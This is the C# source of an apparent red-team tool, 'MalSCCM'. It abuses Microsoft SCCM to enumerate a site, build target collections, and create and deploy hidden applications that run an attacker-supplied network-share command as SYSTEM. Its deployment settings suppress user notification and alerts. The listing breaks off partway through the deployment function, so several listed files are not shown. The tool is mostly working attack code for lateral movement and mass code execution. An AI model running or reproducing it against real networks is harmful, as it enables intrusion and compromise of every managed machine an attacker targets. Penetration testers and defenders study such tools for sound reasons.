Repository: nettitude/MalSCCM
Branch: main
Commit: 651819691194
Files: 20
Total size: 62.7 KB
Directory structure:
gitextract_m5iwekm3/
├── .gitignore
├── MalSCCM/
│ ├── Args/
│ │ ├── ArgumentParser.cs
│ │ ├── ArgumentParserResult.cs
│ │ ├── CommandCollection.cs
│ │ └── Info.cs
│ ├── Commands/
│ │ ├── App.cs
│ │ ├── Checkin.cs
│ │ ├── Group.cs
│ │ ├── ICommand.cs
│ │ ├── Inspect.cs
│ │ └── Locate.cs
│ ├── MalSCCM.csproj
│ ├── Program.cs
│ ├── Properties/
│ │ └── AssemblyInfo.cs
│ └── lib/
│ ├── Application.cs
│ ├── Check.cs
│ ├── Enum.cs
│ └── Groups.cs
├── MalSCCM.sln
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.vs
*.user
[Dd]ebug/
[Rr]elease/
[Bb]in/
[Oo]bj/
.DS_Store
================================================
FILE: MalSCCM/Args/ArgumentParser.cs
================================================
using System.Collections.Generic;
using System.Diagnostics;
namespace MalSCCM.Args
{
public static class ArgumentParser
{
public static ArgumentParserResult Parse(IEnumerable<string> args)
{
var arguments = new Dictionary<string, string>();
try
{
foreach (var argument in args)
{
var idx = argument.IndexOf(':');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
idx = argument.IndexOf('=');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
else
{
arguments[argument] = string.Empty;
}
}
}
return ArgumentParserResult.Success(arguments);
}
catch (System.Exception ex)
{
Debug.WriteLine(ex.Message);
return ArgumentParserResult.Failure();
}
}
}
}
================================================
FILE: MalSCCM/Args/ArgumentParserResult.cs
================================================
using System.Collections.Generic;
namespace MalSCCM.Args
{
public class ArgumentParserResult
{
public bool ParsedOk { get; }
public Dictionary<string, string> Arguments { get; }
private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
{
ParsedOk = parsedOk;
Arguments = arguments;
}
public static ArgumentParserResult Success(Dictionary<string, string> arguments)
=> new ArgumentParserResult(true, arguments);
public static ArgumentParserResult Failure()
=> new ArgumentParserResult(false, null);
}
}
================================================
FILE: MalSCCM/Args/CommandCollection.cs
================================================
using System;
using System.Collections.Generic;
using MalSCCM.Commands;
namespace MalSCCM.Args
{
public class CommandCollection
{
private readonly Dictionary<string, Func<ICommand>> _availableCommands = new Dictionary<string, Func<ICommand>>();
// How To Add A New Command:
// 1. Create your command class in the Commands Folder
// a. That class must have a CommandName static property that has the Command's name
// and must also Implement the ICommand interface
// b. Put the code that does the work into the Execute() method
// 2. Add an entry to the _availableCommands dictionary in the Constructor below.
public CommandCollection()
{
_availableCommands.Add(Inspect.CommandName, () => new Inspect());
_availableCommands.Add(Group.CommandName, () => new Group());
_availableCommands.Add(App.CommandName, () => new App());
_availableCommands.Add(Checkin.CommandName, () => new Checkin());
_availableCommands.Add(Locate.CommandName, () => new Locate());
}
public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)
{
bool commandWasFound;
if (string.IsNullOrEmpty(commandName) || _availableCommands.ContainsKey(commandName) == false)
commandWasFound= false;
else
{
// Create the command object
var command = _availableCommands[commandName].Invoke();
// and execute it with the arguments from the command line
command.Execute(arguments);
commandWasFound = true;
}
return commandWasFound;
}
}
}
================================================
FILE: MalSCCM/Args/Info.cs
================================================
using System;
namespace MalSCCM.Args
{
public static class Info
{
public static void ShowLogo()
{
string logo = @" __ __ _ ____ ____ ____ __ __
| \/ | __ _| / ___| / ___/ ___| \/ |
| |\/| |/ _` | \___ \| | | | | |\/| |
| | | | (_| | |___) | |__| |___| | | |
|_| |_|\__,_|_|____/ \____\____|_| |_|
Phil Keeble @ Nettitude Red Team
";
Console.WriteLine(logo);
}
public static void ShowUsage()
{
string usage = @"Commands listed below have optional parameters in <>.
Attempt to find the SCCM management and primary servers:
MalSCCM.exe locate
Inspect the primary server to gather SCCM information:
MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>
Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>
Create/Deploy/Delete malicious applications:
MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>
Force devices of a group to checkin within a couple minutes:
MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>
";
Console.WriteLine(usage);
}
}
}
================================================
FILE: MalSCCM/Commands/App.cs
================================================
using System;
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public class App : ICommand
{
public static string CommandName => "app";
public static string AppName = "";
public static string UNCPath = "";
public static string AssignmentName = "";
public void Execute(Dictionary<string, string> arguments)
{
if (arguments.ContainsKey("/server"))
{
Inspect.ServerName = arguments["/server"];
}
Console.WriteLine("[*] Action: Manipulating SCCM Applications");
if (arguments.ContainsKey("/groupname"))
{
Group.GroupName = arguments["/groupname"];
}
if (arguments.ContainsKey("/name"))
{
AppName = arguments["/name"];
}
if (arguments.ContainsKey("/uncpath"))
{
UNCPath = arguments["/uncpath"];
}
if (arguments.ContainsKey("/assignmentname"))
{
AssignmentName = arguments["/assignmentname"];
}
if (!Enum.FbGetSiteScope())
{
Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
if (!Enum.FbGetSiteScope2())
{
Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
Enum.FbGetSiteScope3();
}
}
if (arguments.ContainsKey("/create"))
{
Console.WriteLine("[*] Action: Creating SCCM Application");
Application.FbCreateSCCMApplication();
}
if (arguments.ContainsKey("/delete"))
{
Console.WriteLine("[*] Action: Deleting SCCM Application");
Application.FbRemoveSCCMApplication();
}
if (arguments.ContainsKey("/deploy"))
{
Console.WriteLine("[*] Action: Gathering group ID");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("[*] Action: Deploying SCCM Application");
Application.FbDeploySCCMApplication();
}
if (arguments.ContainsKey("/deletedeploy"))
{
Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
Application.FbRemoveSCCMApplicationDeployment();
}
if (arguments.ContainsKey("/cleanup"))
{
Console.WriteLine("[*] Action: Removing SCCM Application Deployment");
Application.FbRemoveSCCMApplicationDeployment();
Console.WriteLine("[*] Action: Deleting SCCM Application");
Application.FbRemoveSCCMApplication();
}
Console.WriteLine("\r\n[*] App complete\r\n");
}
}
}
================================================
FILE: MalSCCM/Commands/Checkin.cs
================================================
using System;
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public class Checkin : ICommand
{
public static string CommandName => "checkin";
public void Execute(Dictionary<string, string> arguments)
{
if (arguments.ContainsKey("/server"))
{
Inspect.ServerName = arguments["/server"];
}
Console.WriteLine("[*] Action: Causing SCCM poll");
if (arguments.ContainsKey("/groupname"))
{
Group.GroupName = arguments["/groupname"];
}
if (!Enum.FbGetSiteScope())
{
Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
if (!Enum.FbGetSiteScope2())
{
Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
Enum.FbGetSiteScope3();
}
}
if (arguments.ContainsKey("/groupname"))
{
Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("[*] Action: Forcing Group To Checkin for Updates");
Check.FbSCCMDeviceCheckin();
}
Console.WriteLine("\r\n[*] Checkin complete\r\n");
}
}
}
================================================
FILE: MalSCCM/Commands/Group.cs
================================================
using System;
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public class Group : ICommand
{
public static string CommandName => "group";
public static string GroupName = "";
public static string GroupType = "";
public static string SystemCollectionID = "";
public static string UserCollectionID = "";
public static string TargetCollectionID = "";
public static string UserName = "";
public static string DeviceName = "";
public static string ResourceID = "";
public void Execute(Dictionary<string, string> arguments)
{
if (arguments.ContainsKey("/server"))
{
Inspect.ServerName = arguments["/server"];
}
Console.WriteLine("[*] Action: Manipulating SCCM Groups");
if (arguments.ContainsKey("/groupname"))
{
GroupName = arguments["/groupname"];
}
if (arguments.ContainsKey("/grouptype"))
{
GroupType = arguments["/grouptype"];
}
if (arguments.ContainsKey("/user"))
{
UserName = arguments["/user"];
}
if (arguments.ContainsKey("/host"))
{
DeviceName = arguments["/host"];
}
if (!Enum.FbGetSiteScope())
{
Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
if (!Enum.FbGetSiteScope2())
{
Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
Enum.FbGetSiteScope3();
}
}
if (arguments.ContainsKey("/create"))
{
Console.WriteLine("[*] Action: Creating SCCM Group");
Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("\r\n[*] Action: Creating Collection");
Groups.FbNewSCCMCollection();
}
if (arguments.ContainsKey("/delete"))
{
Console.WriteLine("[*] Action: Deleting SCCM Group");
Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("\r\n[*] Action: Removing Collection");
Groups.FbRemoveSCCMCollection();
}
if (arguments.ContainsKey("/adduser"))
{
Console.WriteLine("[*] Action: Adding User to an SCCM Group");
Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("\r\n[*] Action: Adding User");
Groups.FbAddUserToSCCMCollection();
}
if (arguments.ContainsKey("/addhost"))
{
Console.WriteLine("[*] Action: Adding System to an SCCM Group");
Console.WriteLine("\r\n[*] Action: Getting Collection IDs");
Groups.FbGetSCCMCollectionID();
Console.WriteLine("\r\n[*] Action: Adding Device");
Groups.FbAddDeviceToSCCMCollection();
}
Console.WriteLine("\r\n[*] Group complete\r\n");
}
}
}
================================================
FILE: MalSCCM/Commands/ICommand.cs
================================================
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public interface ICommand
{
void Execute(Dictionary<string, string> arguments);
}
}
================================================
FILE: MalSCCM/Commands/Inspect.cs
================================================
using System;
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public class Inspect : ICommand
{
public static string CommandName => "inspect";
public static string SiteCode = "";
public static string ServerName = "localhost";
public void Execute(Dictionary<string, string> arguments)
{
if (arguments.ContainsKey("/server"))
{
ServerName = arguments["/server"];
}
Console.WriteLine("[*] Action: Inspect SCCM Server");
if (!Enum.FbGetSiteScope())
{
Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
if (!Enum.FbGetSiteScope2())
{
Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
Enum.FbGetSiteScope3();
}
}
if (arguments.ContainsKey("/all"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
Enum.FbGetSCCMComputer();
Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
Enum.FbGetSCCMADForest();
Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
Enum.FbGetSCCMApplication();
Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
Enum.FbGetSCCMPackage();
Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
Enum.FbGetSCCMCollection();
Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
Enum.FbGetSCCMPrimaryUser();
Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
Enum.FbGetSCCMDeployments();
}
if (arguments.ContainsKey("/computers"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Computers");
Enum.FbGetSCCMComputer();
}
if (arguments.ContainsKey("/forest"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM AD Forest");
Enum.FbGetSCCMADForest();
}
if (arguments.ContainsKey("/applications"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Applications");
Enum.FbGetSCCMApplication();
}
if (arguments.ContainsKey("/packages"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Packages");
Enum.FbGetSCCMPackage();
}
if (arguments.ContainsKey("/groups"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Collections (Groups)");
Enum.FbGetSCCMCollection();
}
if (arguments.ContainsKey("/primaryusers"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Primary Users");
Enum.FbGetSCCMPrimaryUser();
}
if (arguments.ContainsKey("/deployments"))
{
Console.WriteLine("\r\n[*] Action: Get SCCM Deployments");
Enum.FbGetSCCMDeployments();
}
Console.WriteLine("\r\n[*] Inspect complete\r\n");
}
}
}
================================================
FILE: MalSCCM/Commands/Locate.cs
================================================
using System;
using System.Collections.Generic;
namespace MalSCCM.Commands
{
public class Locate : ICommand
{
public static string CommandName => "locate";
public static string SiteCode = "";
public static string ServerName = "localhost";
public void Execute(Dictionary<string, string> arguments)
{
if (arguments.ContainsKey("/server"))
{
ServerName = arguments["/server"];
}
Console.WriteLine("[*] Action: Locating SCCM Management Servers");
if (!Enum.FbGetSiteScope())
{
Console.WriteLine("Getting sitecode from CCM namespace failed, trying SMS instead");
if (!Enum.FbGetSiteScope2())
{
Console.WriteLine("Getting sitecode from WMI failed, attempting client registry keys");
Enum.FbGetSiteScope3();
}
}
Console.WriteLine("\r\n[!] Note - Managment Server may not be the Primary Server which is needed for exploitation.");
Console.WriteLine("[!] Note - You can try use 'inspect /server:<managementserver>' to see if the management server is exploitable.");
Console.WriteLine("[!] Note - If you are on a management server, the registry checks below should return the primary server");
Console.WriteLine("\r\n[*] Action: Locating SCCM Servers in Registry");
Enum.FbGetSCCMPrimaryServerRegKey();
Console.WriteLine("\r\n[!] Note - If looking for reg keys failed, make sure you are on a management server!");
Console.WriteLine("[!] Note - Alternate ways of finding the primary server could be shares on the network (SMS_<sitecode>) will be the name of a share on the primary server.");
Console.WriteLine("\r\n[*] Locate complete\r\n");
}
}
}
================================================
FILE: MalSCCM/MalSCCM.csproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{5439CECD-3BB3-4807-B33F-E4C299B71CA2}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>MalSCCM</RootNamespace>
<AssemblyName>MalSCCM</AssemblyName>
<TargetFrameworkVersion>v3.5</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Args\ArgumentParser.cs" />
<Compile Include="Args\ArgumentParserResult.cs" />
<Compile Include="Args\CommandCollection.cs" />
<Compile Include="Args\Info.cs" />
<Compile Include="Commands\Checkin.cs" />
<Compile Include="Commands\App.cs" />
<Compile Include="Commands\ICommand.cs" />
<Compile Include="Commands\Group.cs" />
<Compile Include="Commands\Locate.cs" />
<Compile Include="Commands\Inspect.cs" />
<Compile Include="lib\Check.cs" />
<Compile Include="lib\Application.cs" />
<Compile Include="lib\Groups.cs" />
<Compile Include="lib\Enum.cs" />
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>
================================================
FILE: MalSCCM/Program.cs
================================================
using System;
using System.Collections.Generic;
using MalSCCM.Args;
namespace MalSCCM
{
class Program
{
private static void MainExecute(string commandName, Dictionary<string, string> parsedArgs)
{
// main execution logic
Info.ShowLogo();
try
{
var commandFound = new CommandCollection().ExecuteCommand(commandName, parsedArgs);
// show the usage if no commands were found for the command name
if (commandFound == false)
Info.ShowUsage();
}
catch (Exception e)
{
Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n");
Console.WriteLine(e);
}
}
public static void Main(string[] args)
{
// try to parse the command line arguments, show usage on failure and then bail
var parsed = ArgumentParser.Parse(args);
if (parsed.ParsedOk == false)
{
Info.ShowLogo();
Info.ShowUsage();
return;
}
var commandName = args.Length != 0 ? args[0] : "";
MainExecute(commandName, parsed.Arguments);
}
}
}
================================================
FILE: MalSCCM/Properties/AssemblyInfo.cs
================================================
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("MalSCCM")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("MalSCCM")]
[assembly: AssemblyCopyright("Copyright © 2022")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("5439cecd-3bb3-4807-b33f-e4c299b71ca2")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
================================================
FILE: MalSCCM/lib/Application.cs
================================================
using System;
using System.Management;
using System.Text;
using MalSCCM.Commands;
public class Application
{
public static bool FbCreateSCCMApplication()
{
try
{
ManagementClass IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification");
ManagementClass AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application");
object[] methodArgs = {null};
object result = IDClass.InvokeMethod("GetSiteID", methodArgs);
string scopeid = (string)methodArgs[0];
var trimscopeid = "ScopeId_" + scopeid.Trim(new char[] { '{', '}' });
Console.WriteLine("ScopeID: " + trimscopeid);
var NewAppID = "Application_" + Guid.NewGuid();
Console.WriteLine("NewAppID: " + NewAppID);
var NewDeployID = "DeploymentType_" + Guid.NewGuid();
Console.WriteLine("NewDeployID: " + NewDeployID);
var NewFileID = "File_" + Guid.NewGuid();
Console.WriteLine("NewFileID: " + NewFileID);
StringBuilder xml = new StringBuilder();
xml.AppendLine(@"<?xml version=""1.0"" encoding=""utf-16""?><AppMgmtDigest xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"" xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance""><Application AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewAppID + @""" Version=""2""><DisplayInfo DefaultLanguage=""en-US""><Info Language=""en-US""><Title>" + App.AppName + @"</Title><Publisher/><Version/></Info></DisplayInfo><DeploymentTypes><DeploymentType AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewDeployID + @""" Version=""2""/></DeploymentTypes><Title ResourceId=""Res_684364143"">" + App.AppName + @"</Title><Description ResourceId=""Res_1018411239""/><Publisher ResourceId=""Res_1340020890""/><SoftwareVersion ResourceId=""Res_597041892""/><CustomId ResourceId=""Res_872061892""/></Application><DeploymentType AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewDeployID + @""" Version=""2""><Title ResourceId=""Res_1244298486"">" + App.AppName + @"</Title><Description ResourceId=""Res_405397997""/><DeploymentTechnology>GLOBAL/ScriptDeploymentTechnology</DeploymentTechnology><Technology>Script</Technology><Hosting>Native</Hosting><Installer Technology=""Script""><ExecutionContext>System</ExecutionContext><DetectAction><Provider>Local</Provider><Args><Arg Name=""ExecutionContext"" Type=""String"">System</Arg><Arg Name=""MethodBody"" Type=""String""><?xml version=""1.0"" encoding=""utf-16""?>");
xml.AppendLine(@"<EnhancedDetectionMethod xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"">");
xml.AppendLine("\t" + @"<Settings xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"">");
xml.AppendLine("\t\t" + @"<File Is64Bit=""false"" LogicalName=""" + NewFileID + @""" xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/07/10/DesiredConfiguration"">");
xml.AppendLine("\t\t\t" + @"<Annotation xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/06/14/Rules"">");
xml.AppendLine("\t\t\t\t" + @"<DisplayName Text="""" />");
xml.AppendLine("\t\t\t\t" + @"<Description Text="""" />");
xml.AppendLine("\t\t\t" + @"</Annotation>");
xml.AppendLine("\t\t\t" + @"<Path>C:\</Path>");
xml.AppendLine("\t\t\t" + @"<Filter>asdf</Filter>");
xml.AppendLine("\t\t" + @"</File>");
xml.AppendLine("\t" + @"</Settings>");
xml.AppendLine("\t" + @"<Rule id=""" + trimscopeid + "/" + NewDeployID + @""" Severity=""Informational"" NonCompliantWhenSettingIsNotFound=""false"" xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/06/14/Rules"">");
xml.AppendLine("\t\t" + @"<Annotation>");
xml.AppendLine("\t\t\t" + @"<DisplayName Text="""" />");
xml.AppendLine("\t\t\t" + @"<Description Text="""" />");
xml.AppendLine("\t\t" + @"</Annotation>");
xml.AppendLine("\t\t" + @"<Expression>");
xml.AppendLine("\t\t\t" + @"<Operator>NotEquals</Operator>");
xml.AppendLine("\t\t\t" + @"<Operands>");
xml.AppendLine("\t\t\t\t" + @"<SettingReference AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewAppID + @""" Version=""2"" DataType=""Int64"" SettingLogicalName=""" + NewFileID + @""" SettingSourceType=""File"" Method=""Count"" Changeable=""false"" />");
xml.AppendLine("\t\t\t\t" + @"<ConstantValue Value=""0"" DataType=""Int64"" />");
xml.AppendLine("\t\t\t" + @"</Operands>");
xml.AppendLine("\t\t" + @"</Expression>");
xml.AppendLine("\t" + @"</Rule>");
xml.AppendLine(@"</EnhancedDetectionMethod></Arg></Args></DetectAction><InstallAction><Provider>Script</Provider><Args><Arg Name=""InstallCommandLine"" Type=""String"">" + App.UNCPath + @"</Arg><Arg Name=""WorkingDirectory"" Type=""String"">C:\Windows\System32</Arg><Arg Name=""ExecutionContext"" Type=""String"">System</Arg><Arg Name=""RequiresLogOn"" Type=""String""/><Arg Name=""RequiresElevatedRights"" Type=""Boolean"">false</Arg><Arg Name=""RequiresUserInteraction"" Type=""Boolean"">false</Arg><Arg Name=""RequiresReboot"" Type=""Boolean"">false</Arg><Arg Name=""UserInteractionMode"" Type=""String"">Hidden</Arg><Arg Name=""PostInstallBehavior"" Type=""String"">BasedOnExitCode</Arg><Arg Name=""ExecuteTime"" Type=""Int32"">0</Arg><Arg Name=""MaxExecuteTime"" Type=""Int32"">120</Arg><Arg Name=""RunAs32Bit"" Type=""Boolean"">false</Arg><Arg Name=""SuccessExitCodes"" Type=""Int32[]""><Item>0</Item><Item>1707</Item></Arg><Arg Name=""RebootExitCodes"" Type=""Int32[]""><Item>3010</Item></Arg><Arg Name=""HardRebootExitCodes"" Type=""Int32[]""><Item>1641</Item></Arg><Arg Name=""FastRetryExitCodes"" Type=""Int32[]""><Item>1618</Item></Arg></Args></InstallAction><CustomData><DetectionMethod>Enhanced</DetectionMethod><EnhancedDetectionMethod><Settings xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest""><File xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/07/10/DesiredConfiguration"" Is64Bit=""false"" LogicalName=""" + NewFileID + @"""><Annotation xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/06/14/Rules""><DisplayName Text=""""/><Description Text=""""/></Annotation><Path>C:\</Path><Filter>asdf</Filter></File></Settings><Rule xmlns=""http://schemas.microsoft.com/SystemsCenterConfigurationManager/2009/06/14/Rules"" id=""" + trimscopeid + "/" + NewDeployID + @""" Severity=""Informational"" NonCompliantWhenSettingIsNotFound=""false""><Annotation><DisplayName Text=""""/><Description Text=""""/></Annotation><Expression><Operator>NotEquals</Operator><Operands><SettingReference AuthoringScopeId=""" + trimscopeid + @""" LogicalName=""" + NewAppID + @""" Version=""2"" DataType=""Int64"" SettingLogicalName=""" + NewFileID + @""" SettingSourceType=""File"" Method=""Count"" Changeable=""false""/><ConstantValue Value=""0"" DataType=""Int64""/></Operands></Expression></Rule></EnhancedDetectionMethod><InstallCommandLine>" + App.UNCPath + @"</InstallCommandLine><InstallFolder>C:\Windows\System32</InstallFolder><ExitCodes><ExitCode Code=""0"" Class=""Success""/><ExitCode Code=""1707"" Class=""Success""/><ExitCode Code=""3010"" Class=""SoftReboot""/><ExitCode Code=""1641"" Class=""HardReboot""/><ExitCode Code=""1618"" Class=""FastRetry""/></ExitCodes><UserInteractionMode>Hidden</UserInteractionMode><AllowUninstall>true</AllowUninstall></CustomData></Installer></DeploymentType></AppMgmtDigest>");
Console.WriteLine("Creating Instance");
ManagementObject newInstance = AppClass.CreateInstance();
newInstance["SDMPackageXML"] = xml.ToString();
newInstance["IsHidden"] = true;
newInstance.Put();
Console.WriteLine("App Created");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbCreateSCCMApplication.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbRemoveSCCMApplication()
{
try
{
var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'");
var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
mgmtScope.Connect();
var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
ManagementObjectCollection objColl = mgmtSrchr.Get();
foreach (ManagementObject obj in objColl)
{
object[] methodArgs = { "True" };
obj.InvokeMethod("SetIsExpired", methodArgs);
Console.WriteLine("App retired");
obj.Delete();
Console.WriteLine("App deleted");
}
Console.WriteLine("App has been deleted successfully");
return true;
}
catch (Exception e)
{
Console.WriteLine("\r\nFunction error - FbRemoveSCCMApplication.");
var stdErr = Console.Error;
stdErr.WriteLine($"Error Message: {e.Message}");
return false;
}
}
public static bool FbDeploySCCMApplication()
{
try
{
ManagementClass AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment");
var TargetCollectionID = Group.TargetCollectionID;
var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'");
var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}");
mgmtScope.Connect();
var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);
var CI_ID = "";
int CI_IDint = 0;
var CI_UniqueID = "";
foreach (var result in mgmtSrchr.Get())
{
CI_ID = result.GetPropertyValue("CI_ID").ToString();
CI_IDint = int.Parse(CI_ID);
CI_UniqueID = result.GetPropertyValue("CI_UniqueID").ToString();
}
var Date = DateTime.Now.ToString("yyyyMMddHHmmss") + ".000000+***";
ManagementObject newInstance = AppAssignementClass.CreateInstance();
newInstance["ApplicationName"] = App.AppName;
newInstance["AssignmentName"] = App.AssignmentName;
newInstance["AssignedCIs"] = new int[] { CI_IDint };
newInstance["AssignmentAction"] = 2;
newInstance["DesiredConfigType"] = 1;
newInstance["LogComplianceToWinEvent"] = false;
newInstance["CollectionName"] = Group.GroupName;
newInstance["CreationTime"] = Date;
newInstance["LocaleID"] = 1033;
newInstance["SourceSite"] = Inspect.SiteCode;
newInstance["StartTime"] = Date;
newInstance["DisableMOMAlerts"] = true;
newInstance["SuppressReboot"] = false;
newInstance["NotifyUser"] = false;
newInstance["TargetCollectionID"] = TargetCollectionID;
newInstance["EnforcementDeadline"] = Date;
newInstance["OfferTypeID"] = 0;
newInstance["OfferFlags"] = 0;
newInstance["Priority"] = 2;
newInstance["UserUIExperience"] = false;
newInstance["WoLEnabled"] = false;
